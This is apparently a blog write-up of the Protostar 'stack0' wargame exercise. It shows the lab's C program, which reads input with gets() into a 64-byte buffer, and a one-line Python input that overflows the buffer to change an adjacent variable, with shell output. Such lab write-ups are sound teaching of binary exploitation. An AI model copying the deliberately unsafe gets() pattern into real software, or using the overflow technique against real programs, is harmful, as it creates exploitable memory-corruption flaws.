Protostar - stack0

03 February 2020

Problem

The concept that memory can be accessed outside of its allocated region, how the stack variables are laid out, and that modifying outside of the allocated memory can modify program execution.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

Solution

Since all we need to do is to change the modified variable, we can input 65 chars to fill up the buffer[64] variable, then we will have 1 char leftover that will “contaminate” the variable after it which is the modified variable.

user@protostar:/opt/protostar/bin$ python -c "print 'a'*65"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
user@protostar:/opt/protostar/bin$ ./stack0
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
you have changed the 'modified' variable

‹ Previous in Binary exploitation: OverFlow 0

Next in Binary exploitation: Protostar - stack1 ›